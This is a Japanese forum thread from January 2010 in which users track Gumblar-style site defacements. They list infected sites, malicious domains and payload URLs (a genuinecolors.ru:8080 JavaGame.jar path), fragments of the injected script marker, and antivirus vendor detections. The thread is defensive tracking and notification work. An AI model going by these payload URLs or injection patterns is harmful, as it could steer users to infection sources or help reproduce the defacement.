2010/01/22(金) 12:47:31トレンドはIDSやってないからねえ。
0336名無しさん@お腹いっぱい。
2010/01/22(金) 12:48:14これはw
もしかして専スレde大炎上を望んでる?
0337名無しさん@お腹いっぱい。
2010/01/22(金) 12:50:230338名無しさん@お腹いっぱい。
2010/01/22(金) 12:50:59誰かν側でスレたてすれば炎上?
0339名無しさん@お腹いっぱい。
2010/01/22(金) 13:03:220340名無しさん@お腹いっぱい。
2010/01/22(金) 13:12:56うわあ
なんで傷口を広げるようなことを言うかねえ
0341名無しさん@お腹いっぱい。
2010/01/22(金) 13:13:460342名無しさん@お腹いっぱい。
2010/01/22(金) 13:23:22http://www.google.com/search?num=100&q=%3Cscript%3E%2F%2AException%2A%2F%20document%2Ewrite%28%27%3Cscript%20src%3D%27%2B%27h%23%28%26t%28t
0343名無しさん@お腹いっぱい。
2010/01/22(金) 13:29:03流石だなww
0344名無しさん@お腹いっぱい。
2010/01/22(金) 13:31:38告知せず&意味不な事を書いて逃げるサイトは
消えて無くなった方が良いから。
隠す・逃げるサイトは徹底的に叩かれるべき
0345名無しさん@お腹いっぱい。
2010/01/22(金) 13:34:35〒541-0046 大阪市中央区平野町2-3-7 アーバンエース北浜ビル12F
〒541-0041 大阪市中央区北浜1-3-14 西川三井ビルディング10F
電話 06-6231-0550
FAX 06-6231-1077
[email protected]
0346名無しさん@お腹いっぱい。
2010/01/22(金) 13:36:53☆☆☆ スレ立て依頼所 ☆☆☆
http://tsushima.2ch.net/test/read.cgi/news/1263949139/
0347名無しさん@お腹いっぱい。
2010/01/22(金) 13:39:550348名無しさん@お腹いっぱい。
2010/01/22(金) 13:42:060349名無しさん@お腹いっぱい。
2010/01/22(金) 13:52:15見つけ次第許さないよw
0350名無しさん@お腹いっぱい。
2010/01/22(金) 13:57:18ナノインパクトHPウイルス感染→スクリプト埋め込みを否定
http://tsushima.2ch.net/test/read.cgi/news/1264136190/
0351名無しさん@お腹いっぱい。
2010/01/22(金) 14:00:030352名無しさん@お腹いっぱい。
2010/01/22(金) 14:01:08>>1なんて読まないし
0353名無しさん@お腹いっぱい。
2010/01/22(金) 14:01:16乙と言いたいところだが・・・
説明不足だろJK・・・
0354名無しさん@お腹いっぱい。
2010/01/22(金) 14:04:58マイナーサイトなんてやられてましたすいませんって謝っておくか完全無視きめこんどけば
話題にもならないのに
わざわざ嘘ついて話題になるとか狙ってんのか?
0355名無しさん@お腹いっぱい。
2010/01/22(金) 14:07:05経営陣が社員に恨まれてるとかかも?
0356名無しさん@お腹いっぱい。
2010/01/22(金) 14:22:51一番たち悪いな
0357名無しさん@お腹いっぱい。
2010/01/22(金) 14:32:42働けよ
0358名無しさん@お腹いっぱい。
2010/01/22(金) 14:34:410359名無しさん@お腹いっぱい。
2010/01/22(金) 14:44:44日本コンピュータセキュリティインシデント対応チーム協議会
http://www.nca.gr.jp/2010/netanzen/index.html
0360名無しさん@お腹いっぱい。
2010/01/22(金) 14:50:17働くことに対するポリシーの無い人は,自分さえ感染しなきゃおkなの?
0361名無しさん@お腹いっぱい。
2010/01/22(金) 14:51:150362名無しさん@お腹いっぱい。
2010/01/22(金) 14:58:52煽り文句は板別に設定すべきだと思うよ
0363名無しさん@お腹いっぱい。
2010/01/22(金) 15:27:530364名無しさん@お腹いっぱい。
2010/01/22(金) 15:37:46悔しかったら告知&お詫びしろ
話 は そ れ か ら だ
0365名無しさん@お腹いっぱい。
2010/01/22(金) 15:40:21○ホームセキュリティ
0366名無しさん@お腹いっぱい。
2010/01/22(金) 15:51:57< `∀´>
< つ=つ
ノ ノ三)
∠、 m)=m)
0367名無しさん@お腹いっぱい。
2010/01/22(金) 15:52:58ホームセキュリティの人が検体送付とか電凸とかマメにしてくれてんのか
0368名無しさん@お腹いっぱい。
2010/01/22(金) 15:59:36馬鹿に出来ねえ
0369名無しさん@お腹いっぱい。
2010/01/22(金) 16:18:29『/*GNU GPL*/』→『/*LGPL*/』→『/*handle exception*/』
となってってるそうで。
難読化も無く判断しづらい物になってるらしい。悪質だね。
0370名無しさん@お腹いっぱい。
2010/01/22(金) 16:20:030371名無しさん@お腹いっぱい。
2010/01/22(金) 16:59:46利用者はグーグルロボット2名でした
0372名無しさん@お腹いっぱい。
2010/01/22(金) 17:02:43www
0373名無しさん@お腹いっぱい。
2010/01/22(金) 17:03:10凸完了
HPを作っているのはHP製作会社ではなく
友人にお願いをして作って貰ったとか。。
0374名無しさん@お腹いっぱい。
2010/01/22(金) 17:10:50おまえは偉い
0375名無しさん@お腹いっぱい。
2010/01/22(金) 17:12:300376名無しさん@お腹いっぱい。
2010/01/22(金) 17:13:16サイト運営者の鏡だよ
アク解に残ってない閲覧者もいるかもしれないし
0377名無しさん@お腹いっぱい。
2010/01/22(金) 17:17:48シネ基地外。何してやったりな顔してんだよw
0378名無しさん@お腹いっぱい。
2010/01/22(金) 17:19:11あたま大丈夫か?
何に毒されたらそうなっちゃうの?
0379名無しさん@お腹いっぱい。
2010/01/22(金) 17:26:10アクセス解析に残ってない閲覧者って何だよ?
0380名無しさん@お腹いっぱい。
2010/01/22(金) 17:28:57アク解に残らないようにするブラウザ用アドオンとか出回ってるんだけど知らない?
hostsに書き込んで拒否してる人も結構いるし
0381名無しさん@お腹いっぱい。
2010/01/22(金) 17:30:490382名無しさん@お腹いっぱい。
2010/01/22(金) 17:31:340383名無しさん@お腹いっぱい。
2010/01/22(金) 17:34:340384名無しさん@お腹いっぱい。
2010/01/22(金) 17:40:19かわいそす
0385名無しさん@お腹いっぱい。
2010/01/22(金) 17:42:270386名無しさん@お腹いっぱい。
2010/01/22(金) 17:49:230387名無しさん@お腹いっぱい。
2010/01/22(金) 17:50:23そうだよねシス管として致命的だもんね
恥ずかしいよね
0388名無しさん@お腹いっぱい。
2010/01/22(金) 17:54:52何故海外からのアクセスを許しているのか?(FTP鯖)
せめて国内オンリーにしろよ・・・
0389名無しさん@お腹いっぱい。
2010/01/22(金) 18:04:19どうやって設定すればいいの?
0390名無しさん@お腹いっぱい。
2010/01/22(金) 18:07:56いろんなプロバイダを使ってるから一律拒否出来ない
海外禁止ってやるのはいいが拒否するドメイン全て登録させるとか出来ない
それにもし許可リストを使うにしてもリストの管理はサーバ屋に頼めば基本有料になるはず
0391名無しさん@お腹いっぱい。
2010/01/22(金) 18:09:25本体じゃなくGoogleキャッシュで見てるとか?
0392名無しさん@お腹いっぱい。
2010/01/22(金) 18:17:19GeoIPとiptable等のパケットフィルタでおkだろ
0393名無しさん@お腹いっぱい。
2010/01/22(金) 18:26:50アク解もキャッシュされてたらそれでも足跡残るよ
0394名無しさん@お腹いっぱい。
2010/01/22(金) 18:37:18こういうウイルス作ったり
不正アクセスでサイト改ざんしたら捕まるの?
その主犯を捕まえることはできないの?
教えてエロイ人
0395名無しさん@お腹いっぱい。
2010/01/22(金) 18:39:230396名無しさん@お腹いっぱい。
2010/01/22(金) 18:42:540397名無しさん@お腹いっぱい。
2010/01/22(金) 18:48:510398名無しさん@お腹いっぱい。
2010/01/22(金) 18:51:37http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2129
>なお、改ざんを告知せずにこっそり該当部分を修正し、何事もなかったかのように再開している
>悪質ともいえるサイトもたくさんある中、正直に改ざんの事実を告げて謝罪し、ユーザーに対応を
>促しているサイトだということを付言しておきたい。
0399名無しさん@お腹いっぱい。
2010/01/22(金) 18:57:06ブログに貼っていい?
0400名無しさん@お腹いっぱい。
2010/01/22(金) 18:58:08質問。この辺にあるアドレスが含まれてるjavaコードは
genoウイルスの可能性があるってことでいいんですか?
0401名無しさん@お腹いっぱい。
2010/01/22(金) 19:00:000402名無しさん@お腹いっぱい。
2010/01/22(金) 19:02:550403名無しさん@お腹いっぱい。
2010/01/22(金) 19:10:31気休めだな
0404名無しさん@お腹いっぱい。
2010/01/22(金) 19:13:13通ってるサイトに上にあるURLが含まれた変なコードがくっ付いているんです
genoかと思って調べてたらここにたどり着きましたもので。
ウイルスじゃなくて、あまり問題ない物ならいいんですけど
メールで一言伝えようか迷ってたもんで
0405名無しさん@お腹いっぱい。
2010/01/22(金) 19:15:09見てやるからさらせよそのサイト
0406名無しさん@お腹いっぱい。
2010/01/22(金) 19:31:34404が直リンする予感
0407名無しさん@お腹いっぱい。
2010/01/22(金) 19:49:21nikkansportsって・・・
ソフト更新はしてるけどやべぇな
0408名無しさん@お腹いっぱい。
2010/01/22(金) 20:27:54知り合いなら伝えてやればいいけど
そうじゃないなら本人じゃなく管理会社に伝えた方が正確かもしれん
0409名無しさん@お腹いっぱい。
2010/01/22(金) 21:31:26>新たなコードを埋め込まれたサイトの中には、修復済みだったはずのサイトもいくつか含まれている。
そんな間抜けな修復を行う管理者もアレだが、歯止めがかからんな
告知不足、不完全ってのもあるのかな・・・・
0410名無しさん@お腹いっぱい。
2010/01/22(金) 21:32:49ttp://www.bbsec.co.jp/aboutus/press/100122.html
私は、こういう銭ゲバみたいなのは嫌いだ
0411名無しさん@お腹いっぱい。
2010/01/22(金) 22:18:40/*Exception*/
0412名無しさん@お腹いっぱい。
2010/01/22(金) 22:33:21それ、まさかそのスレッドがやられているってこと?
正直に話してくれ
0413名無しさん@お腹いっぱい。
2010/01/22(金) 22:34:23ワロタ
0414名無しさん@お腹いっぱい。
2010/01/22(金) 22:36:30貼られてるリンク先だよ
安心しろよw
0415名無しさん@お腹いっぱい。
2010/01/22(金) 22:37:20再感染
http://pc11.2ch.net/test/read.cgi/sec/1261855221/985-999n
http://namidame.2ch.net/test/read.cgi/car/1257733373/172-174n
0416名無しさん@お腹いっぱい。
2010/01/22(金) 22:40:44検出NODだけ
http://www.virustotal.com/analisis/380466ea50ef6cd7ffdc7e35ad756ee9a4f8736474aa0e7552ad6889c1012382-1264167242
avastには検体提出済み
誰か他のもよろしく
0417名無しさん@お腹いっぱい。
2010/01/22(金) 22:42:390418名無しさん@お腹いっぱい。
2010/01/22(金) 22:47:04化け物か
0419名無しさん@お腹いっぱい。
2010/01/22(金) 22:56:200420名無しさん@お腹いっぱい。
2010/01/22(金) 22:57:47あれってあてにならないんじゃなかった?
0421名無しさん@お腹いっぱい。
2010/01/22(金) 23:00:08あれはネタにもならない
0422名無しさん@お腹いっぱい。
2010/01/22(金) 23:06:290423名無しさん@お腹いっぱい。
2010/01/22(金) 23:08:010424名無しさん@お腹いっぱい。
2010/01/22(金) 23:08:460425名無しさん@お腹いっぱい。
2010/01/22(金) 23:13:51見てきた
> 23 名前: モンドリ(東京都)[] 投稿日:2010/01/22(金) 16:36:14.22 ID:AdO+SHBS ?2BP(778)
> キャッシュ消せば大丈夫って
> ウイルスに詳しいGENOの店の人がいってただろ!
このレス見れただけで満足だわ 懐かしいなw色々と半年前のこと思い出したわww
0426名無しさん@お腹いっぱい。
2010/01/22(金) 23:22:05告知もせず無視決め込んだパルコールは勝ちだな
0427名無しさん@お腹いっぱい。
2010/01/22(金) 23:27:05このままにする気かな
0428名無しさん@お腹いっぱい。
2010/01/23(土) 00:13:41かすぺ
> Hello,
>
>
> index.html, scooooop.html - Trojan-Downloader.JS.Pegel.c
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
>
> Regards, Vorobiov Vitaly
> Virus Analyst
0429名無しさん@お腹いっぱい。
2010/01/23(土) 00:16:520430名無しさん@お腹いっぱい。
2010/01/23(土) 00:19:29なんでかすがが出てくるんだろう
0431名無しさん@お腹いっぱい。
2010/01/23(土) 00:51:060432名無しさん@お腹いっぱい。
2010/01/23(土) 01:05:21どこがだよ
0433名無しさん@お腹いっぱい。
2010/01/23(土) 01:26:580434名無しさん@お腹いっぱい。
2010/01/23(土) 02:27:21/*Exception*/ さんは新型か
genuinehollywood.ruを追加
0435名無しさん@お腹いっぱい。
2010/01/23(土) 02:31:33tkfd-shumatsu-gakko●jp
0436名無しさん@お腹いっぱい。
2010/01/23(土) 03:14:55ribbon.toにめる
0437名無しさん@お腹いっぱい。
2010/01/23(土) 03:20:41yourtruemate.ru
0438名無しさん@お腹いっぱい。
2010/01/23(土) 03:32:070439名無しさん@お腹いっぱい。
2010/01/23(土) 03:45:270440名無しさん@お腹いっぱい。
2010/01/23(土) 03:46:51chromeだとview-source:で危険なサイトでブロックされると、
表示許可したときにソースではなく普通に表示されたような気がする
ブロックされなければ平気
0441名無しさん@お腹いっぱい。
2010/01/23(土) 03:53:14もし見ていたら、「Gumblarウイルスからコンピュータを保護する」ページのFirefoxの項目は
修正することを提言しておきます。
3.6ではツール-オプション-コンテンツの「Javaを有効にする」は無くなっていますので。
FirefoxをJavaを無効にする方法はこちらを紹介した方がよいのではないでしょうか?
Java アプレットを無効にするには
ttp://support.mozilla.com/ja/kb/Java%20%E3%82%A2%E3%83%97%E3%83%AC%E3%83%83%E3%83%88%E3%82%92%E7%84%A1%E5%8A%B9%E3%81%AB%E3%81%99%E3%82%8B%E3%81%AB%E3%81%AF
0442名無しさん@お腹いっぱい。
2010/01/23(土) 03:54:16一応そこの管理人にめるしたけど、スパム扱いされるの必至なので
ドメインから逝こうとしてライブドアかと思ったらAAA!CAFEなのね。。。
0443名無しさん@お腹いっぱい。
2010/01/23(土) 03:56:20あんがと。
>>437 を見てみたけど ESETでブロックされた。
怖いからもう止めますw
0444名無しさん@お腹いっぱい。
2010/01/23(土) 04:05:22Sophosきてました。
http://www.virustotal.com/analisis/e064a38951cdc837dcc80a7093cc4eb2f19fab6753268f74d7928ab1874baf22-1264184719
File index.htm received on 2010.01.22 18:25:19 (UTC)
Result: 3/40 (7.50%)
Kaspersky 7.0.0.125 2010.01.22 Trojan-Downloader.JS.Pegel.c
NOD32 4797 2010.01.22 JS/TrojanDownloader.Agent.NRO
Sophos 4.50.0 2010.01.22 Troj/JSRedir-AR
0445名無しさん@お腹いっぱい。
2010/01/23(土) 04:12:47Avira
> Filename Result
> index.html MALWARE
> The file 'index.html' has been determined to be 'MALWARE'.Our analysts named the threat JS/Agent.33127.The term "JS/" denotes a Java scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.
>
>
> Filename Result
> scooooop.html MALWARE
> The file 'scooooop.html' has been determined to be 'MALWARE'.Our analysts named the threat JS/Agent.505009.The term "JS/" denotes a Java scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.
0446名無しさん@お腹いっぱい。
2010/01/23(土) 04:16:14Fortinet
> Dear Customer,
>
> We have analyzed the sample you provided and developed the
> pattern to catch it. We will add detection for this sample
> in the next regular update.
>
> The sample you submitted will be detected as "JS/MalRedir.B!tr.dldr".
>
> Regards,
> --
> Alexandre Aumoine
> Anti-Virus Analyst, Threat Response Team - EMEA
>
> To submit a suspicious file to Fortinet:
> http://www.fortinet.com/FortiGuardCenter/virus_scanner.html
0447名無しさん@お腹いっぱい。
2010/01/23(土) 04:21:27ttp://www.google.co.jp/search?hl=ja&q=%22%3Cscript%3E%2F*Exception*%2F+document.write%28%22%2B%22%3Cscript+src%22&btnG=%E6%A4%9C%E7%B4%A2&lr=
0448名無しさん@お腹いっぱい。
2010/01/23(土) 04:52:25カスペのログを見るとこのようになっています。
許可しました http://icq-com●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar
OK http://icq-com●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar/META-INF/MANIFEST●MF
OK http://icq-com●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar/myf/y/PayloadX●class
OK http://icq-com●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar/myf/y/AppletX●class
検出&禁止しました http://icq-com●bangbros1●com.adsrevenue-net●genuinecolors●ru:8080/pics/JavaGame●jar/myf/y/LoaderX●class
許可しました http://icq-com●bangbros1●com●adsrevenue-net●genuinecolors●ru:8080/pics/myf/y/AppletX●class
再現しようとしてもカスペのログに何も表示されません。
OKしたものや最後の許可で私が感染済なので無反応なのでしょうか?
0449名無しさん@お腹いっぱい。
2010/01/23(土) 05:00:09現在冬眠中。のはずだが・・
ttp://www.google.com/safebrowsing/diagnostic?site=Gumblar.cn&hl=ja
センセイは毎日捕捉中w
■Gumblar.8080系(と呼ぶことになったらしい)
/*LGPL*/:ちょっと迷走した後/*Exception*/に進化
※世界各地で絶賛バージョンアップ中。
検索ワード:"<script>/*Exception*/ document.write("+"<script src"
/*CODE1*/:弾かれまくるので追跡を断念
※情報求ム
■何故かスルーされる亜種っぽいやつ
<script>function〜:8080系の亜種?
少しずつ減ってきたっぽい。
0450名無しさん@お腹いっぱい。
2010/01/23(土) 05:21:17一度アクセスしたIPははじかれるらしいので試すならIP変えないとだめだね
でもそういうデザインの感染サイトすごくいっぱいあるよね
直しました
IETabが3.6に対応したらまた書き直す
0452名無しさん@お腹いっぱい。
2010/01/23(土) 10:18:17ttp://www.rcsmovie.co●jp/
0453名無しさん@お腹いっぱい。
2010/01/23(土) 10:31:19ワーオ、そこ京都(大阪でも?)ではそこそこ有名よ〜
単館上映映画見る人がかなりチェックしてると思う。
0454名無しさん@お腹いっぱい。
2010/01/23(土) 11:06:41ただ、Gumblarに感染後、forhomessale.ru に感染した旨を通知する通信が発生するらしいんだが
Gumblar感染後、forhomessale.ru の名前解決に失敗してるっぽい、、、
それでもFTPアカウントは窃取されんのかな?
0455名無しさん@お腹いっぱい。
2010/01/23(土) 11:09:57Last-Modified: Fri, 22 Jan 2010 11:53:46 GMT
0456名無しさん@お腹いっぱい。
2010/01/23(土) 11:53:40似たようなサイト作ってるんで,そのメールアドレスから送信しておいたよ。
キャッシュにはAvast5反応してくれるんだけど,トップページのにはまだ
反応してくれない。次の更新で対応してくれてればいいけど。
0457名無しさん@お腹いっぱい。
2010/01/23(土) 11:54:51> ■Gumblar.cn(Gumblar、Gumblar.x)
Gumblar.xはGumblar(GENO)とは別にして欲しい
0458名無しさん@お腹いっぱい。
2010/01/23(土) 12:13:26ttp://www.google.co.jp/search?hl=ja&q=http%3A%2F%2Fwww.rcsmovie.co.jp%2F+%E9%9B%BB%E8%A9%B1%E7%95%AA%E5%8F%B7&btnG=%E6%A4%9C%E7%B4%A2&lr=
凸完了
感染は以前もあり、対応済みとのことww
0459名無しさん@お腹いっぱい。
2010/01/23(土) 12:16:43鍵を代えるだの穴を塞ぐだのではなく
0460名無しさん@お腹いっぱい。
2010/01/23(土) 12:31:42乙です。
どんな対策か気になりますね
0461名無しさん@お腹いっぱい。
2010/01/23(土) 13:28:40期待は出来ないと考えた方がいいかもです
HPを作っている方は専門会社ではなく
ボランティアスタッフが作っているとか
映画チケットを貰ってるそうなので
無料奉仕ではなさそうですが
0462名無しさん@お腹いっぱい。
2010/01/23(土) 14:12:08>>452 whois上流のとこ (´-`).。oO(届いてくれればいいなぁ…)
それぞれめる
>>461
お疲れ様です。
まだ直ってなかったので上流にめるしました。
0463名無しさん@お腹いっぱい。
2010/01/23(土) 14:31:08>>456
乙です。
助かります。
0464名無しさん@お腹いっぱい。
2010/01/23(土) 15:19:57genuinehollywood●ru:8080
札幌市公園緑化協会直ったんじゃなかったっけ?
リンク元はなさそうだから残骸っぽいけど、日付が
www●sapporo-park●or●jp/blog_odori/wp-includes/js/tinymce/utils/mctabs●js
Last-Modified: Fri, 22 Jan 2010 01:49:02 GMT
www●sapporo-park●or●jp/blog_nishioka/wp-includes/js/scriptaculous/dragdrop●js
Last-Modified: Fri, 22 Jan 2010 01:20:42 GMT
genuinehollywood●ru:8080
ちなみに、index●php はどうやってデコードしてるんですか?
0465名無しさん@お腹いっぱい。
2010/01/23(土) 15:20:54保護モード使えばブラウザやプラグインのバグで無警告でやられるのなんて無いだろ
警告メッセージがでてOKだせばやられるとかだし
0466名無しさん@お腹いっぱい。
2010/01/23(土) 15:30:03埋め込み動画が再生出来ない・・・
ttp://www.katch.ne.jp/~kakonacl/burauza/burauza.html
0467名無しさん@お腹いっぱい。
2010/01/23(土) 15:49:20みんな使ってると思うが
統計でも取ったのか?
0468名無しさん@お腹いっぱい。
2010/01/23(土) 17:00:25今回は関係ないけど、常に穴があると思って用心したほうが良いよ。
ttp://slashdot.jp/security/article.pl?sid=10/01/21/0350220
NT以降の全ての32ビットWindowsバージョンでユーザー権限昇格を許すバグが見つかる
ttp://japan.zdnet.com/news/sec/story/0,2000056194,20407192,00.htm
マイクロソフト、32ビットWindowsカーネルの脆弱性について警告
0469名無しさん@お腹いっぱい。
2010/01/23(土) 18:34:31LINDOWS?つかえって
0470名無しさん@お腹いっぱい。
2010/01/23(土) 18:46:320471名無しさん@お腹いっぱい。
2010/01/23(土) 18:53:000472名無しさん@お腹いっぱい。
2010/01/23(土) 19:03:21FxとIE8併用だけどIEはしばらく開かんとこう・・
AVも気休め程度のAVGじゃ不安だ。不安すぐる。
0473名無しさん@お腹いっぱい。
2010/01/23(土) 19:11:44ポート変われば意味ないだろうけど。
0474名無しさん@お腹いっぱい。
2010/01/23(土) 20:17:210475名無しさん@お腹いっぱい。
2010/01/23(土) 23:37:29http://www.sakura.ad.jp/news/archives/20100119-004.news
ガンブラー再燃を契機にセキュリティの基本を見直そう
http://itpro.nikkeibp.co.jp/article/Interview/20100120/343557/?ST=security
埋め込みコード変えドメインも一新、拡散続ける正規サイト改ざん
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2130
ガンブラーと呼ばれている一連のサイト改ざん(Gumblar.x、8080)は、
ウイルスに感染したサイト管理者のパソコンから
サイト更新用のFTPアカウントを盗み出し、それを使って行っている。
SQLインジェクションのようにWebサイトの穴を探して入り込んでくるのではなく、
正面玄関から堂々と入って来てしまうのだ。
0476名無しさん@お腹いっぱい。
2010/01/23(土) 23:44:34http://www.yomiuri.co.jp/net/security/goshinjyutsu/20100121-OYT8T00741.htm?from=nwlb
0477名無しさん@お腹いっぱい。
2010/01/23(土) 23:55:25【トレンドマイクロ】
\(^o^)/オワタ
0478名無しさん@お腹いっぱい。
2010/01/23(土) 23:57:580479名無しさん@お腹いっぱい。
2010/01/23(土) 23:58:090480名無しさん@お腹いっぱい。
2010/01/24(日) 00:21:20http://ameblo.jp/suzu-gyosei/entry-10439409700.html
> 2010-01-21 15:50:20
> 当事務所のホームページ「カーポスト」が
> 年明けのいつごろかにgumplerにより改ざんされておりました。
> サーバー会社と連携して、現在感染しているファイルが
> ないことを確認致しました。
これって、/*GNU GPL*/が入ってるここのことだよな
http://www●car-post●jp/
Last-Modified: Tue, 19 Jan 2010 03:52:37 GMT
とりあえずgoogleさんに聞いてみよう
ttp://74●125●153●132/search?q=cache:lbVrFVlo7lYJ:www.car-post.jp/&cd=1&hl=ja&ct=clnk&gl=jp
このページは 2010年1月13日 16:13:55 GMT に取得されたものです
/*LGPL*/が入ってたんだな……えっ
某日 /*LGPL*/ ハケーン
19日 (/*GNU GPL*/入り)バックアップから復旧しますた
21日 サーバー会社と連携して、現在感染しているファイルがないことを確認致しました(キリッ!)
って話なのか
詳しい奴教えてくれ
0481名無しさん@お腹いっぱい。
2010/01/24(日) 00:25:10>>448のサイトも、ちゃんとアクセスをブロックしてるログでてる。
この手の、他サイトへアクセスしてウイルスに感染させるタイプにすごく有効じゃね?
0482448
2010/01/24(日) 00:27:55WinXPSP3でKaspersky Internet Security 2010を使っています。
0483名無しさん@お腹いっぱい。
2010/01/24(日) 00:32:33亜種が生まれ続けているので感染していないと言い切れない
0484名無しさん@お腹いっぱい。
2010/01/24(日) 00:34:16http://www●car-post●jp/
いまみてきた
/*GNU GPL*/いたお
0485名無しさん@お腹いっぱい。
2010/01/24(日) 00:35:48サーバー会社もろとも終わってるな
halfsite.ruか
ttp://gumblarchecker.crz.jp/defend.html#mbsa
追加
0487名無しさん@お腹いっぱい。
2010/01/24(日) 00:39:33心配な場合はOS入れなおしが精神的にも安心安全
0488名無しさん@お腹いっぱい。
2010/01/24(日) 00:40:17RequestPolicyで確認したお!怪しいのブロックしてるお!ww
0489名無しさん@お腹いっぱい。
2010/01/24(日) 00:41:14火狐野朗が
0490名無しさん@お腹いっぱい。
2010/01/24(日) 00:48:13乙
0491448
2010/01/24(日) 01:34:42少し不安は残りますが>>6の更新とアンチウイルスソフトのアップデートをまめにしつつしばらくこのままで行こうと思います。
0492名無しさん@お腹いっぱい。
2010/01/24(日) 01:37:37上:さくら
下:そこだけじゃないことを確認/*Exception*/ blogがいくつか… 作業中
> index●php はどうやってデコードしてるんですか?
上のほうにあるスクリプトのこと?
メモ帳でガリガリ
0493名無しさん@お腹いっぱい。
2010/01/24(日) 01:51:06作業にもどります。
0494名無しさん@お腹いっぱい。
2010/01/24(日) 01:57:540495名無しさん@お腹いっぱい。
2010/01/24(日) 01:57:59粕は、まとめて検出の後任が
どうもTrojan-Downloader.JS.Gumblar.x (Gumblar) から
現段階Trojan-Downloader.JS.Pegel.c (.Pegel) になった模様。
ttp://www.kaspersky.com/viruswatchlite?search_virus=Gumblar
ttp://www.kaspersky.com/viruswatchlite?search_virus=Pegel
ペ? ペゲ? ペジ?
0496名無しさん@お腹いっぱい。
2010/01/24(日) 02:01:110497名無しさん@お腹いっぱい。
2010/01/24(日) 03:11:28下:とりあえずwhoisからめる
0498名無しさん@お腹いっぱい。
2010/01/24(日) 03:42:06ベンダーに任せるよ・・・
0499名無しさん@お腹いっぱい。
2010/01/24(日) 03:42:52これはもうどこに通報すればいいんだろ。。。
0500名無しさん@お腹いっぱい。
2010/01/24(日) 03:51:12大丈夫にゃんだろか。
ねるねるねるね
0501名無しさん@お腹いっぱい。
2010/01/24(日) 04:10:54\ ■■ /
\ ■■■ \∧∧∧∧∧∧∧∧∧∧∧∧∧∧/
\ ■■■■ < ━ ╋ ┓ ┃>
\ ■■■■ /< ━┓ ╋ ┃ ┃ ┃>
\ ■■☆■■ / < ┃ ┏╋━ ┃ ┃ >
\ ■■■■■/ < ┃ ┗┛ ┗ ・>
彡| ━ ━ |ミ /∨∨∨∨∨∨∨∨∨∨∨∨∨\
彡彡|─◎─◎─|ミミ
─────彡彡| ┌└ ┐ |ミミ───────────────
彡彡| ─── |ミミミ
彡彡彡\\二/ /ミミミ テーレッテレー♪
彡彡彡▲\__/▲ミミミ
/彡彡▲■■■■■▲ミミ\ ねっておいしい
/ 彡彡 ■■■■■■■ミミ \ ねるねるね〜るね♪
0502名無しさん@お腹いっぱい。
2010/01/24(日) 07:17:50> http://itpro.nikkeibp.co.jp/article/Interview/20100120/343557/?ST=security
俺たちの誤解なんだってさ
> ■変更履歴
> 記事公開当初、ガンブラー攻撃によるWeb改ざんはSQLインジェクション
> によるものだという誤解を招く表現があったため、これを修正しました。
> [2010/1/22 15:40]
記念にDiffておくよ
*****【旧】
ガンブラー攻撃によるWeb改ざん手口は、Webアプリケーションのぜい弱性を攻撃する「SQLインジェクション」が主流です。今回のWeb改ざんも、おそらくSQLインジェクションによるものだと推測しています。
*****【改】
一般的に、Web改ざんの手口はWebアプリケーションのぜい弱性を攻撃する「SQLインジェクション」が主流です。今回のガンブラー攻撃によるWeb改ざんにも、SQLインジェクションが使われた可能性があると推測しています
*****
*****【旧】
まずは、最新のセキュリティ製品を使って、Webアプリケーションのぜい弱性を検出/修正してください。前述のように、ガンブラーによるWeb改ざん手口の主流はSQLインジェクションです。
*****【改】
まずは、最新のセキュリティ製品を使って、Webアプリケーションのぜい弱性を検出/修正してください。前述のように、ガンブラーによるWeb改ざん手口にはSQLインジェクションが使われている可能性があるためです。
*****
*****【旧】
*****【改】
■変更履歴
記事公開当初、ガンブラー攻撃によるWeb改ざんはSQLインジェクションによるものだという誤解を招く表現があったため、これを修正しました。
[2010/1/22 15:40]
*****
0503名無しさん@お腹いっぱい。
2010/01/24(日) 07:24:22どう見てもSQLインジェクションと関連付けたがってるようにしか見えない。
0504名無しさん@お腹いっぱい。
2010/01/24(日) 07:28:40> 大辞林 第二版 (三省堂)
>
> ごかい 【誤解】
>
> (名)スル
>
> 事実や言葉などを誤って理解すること。思い違い。
> 「真意を―する」「―を招く」
0505名無しさん@お腹いっぱい。
2010/01/24(日) 07:41:11トレンドマイクロ醜態をさらしたなw
だいたい固定コンテンツしかないようなサイトまで被害にあってる時点でSQLインジェクション説は微妙なのにね
0506名無しさん@お腹いっぱい。
2010/01/24(日) 07:43:21セキュリティー企業なのにトレンドマイクロアホすぎるだろ
素人がやってんのか?
0507名無しさん@お腹いっぱい。
2010/01/24(日) 08:17:50htmlのような静的なコンテンツしか置けないGeocitysでも起こってるから100%あり得ない
0508名無しさん@お腹いっぱい。
2010/01/24(日) 08:44:15_「/ ̄ く /
lYノノ/_ノl_ヽ))
<イ( l l )l> / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
<|)'|l、"(フノ|l < えっちのような性的なコンテンツはいけないと思います!
,(ヨリ<>o<>リ'] \______________
|ト‐!]-ム- i']l
ヽ_ノv__l/ /
. ノ[//‐─‐/_/、
( /E|, (フlヨ \
,-| El___lヨ /
└-\`^^^^^^´/
0509名無しさん@お腹いっぱい。
2010/01/24(日) 08:55:32http://itpro.nikkeibp.co.jp/article/NEWS/20080312/296062/
ここから時計が止まってるんだ
きっとそうに違いない
0510名無しさん@お腹いっぱい。
2010/01/24(日) 08:56:57>一部のセキュリティソフトにおいて、
>当ホームページへのアクセス遮断や、
>感染警告の表示などが発生している様です。
>早急な対応を試みておりますが、
>じゅうぶんご注意ください。
改竄されてました,とは意地でも書かないのね
0511名無しさん@お腹いっぱい。
2010/01/24(日) 09:21:45恥ずかしいので Hide ::
まず、最初に事態が発生したのは 2009年3月ごろ
lite〜.cnとかいう変なドメインから
"drive by download"なる攻撃手法が発生しました。
当初、原因ははっきりせず、
やがて Adobe Flash/Readerの「最新版では塞がれている脆弱性」を
つかった自動マルウェア埋め込みの手法であることが判明しました。
これは、当時としては「なにタワゴト言ってるんだ」というレベルの
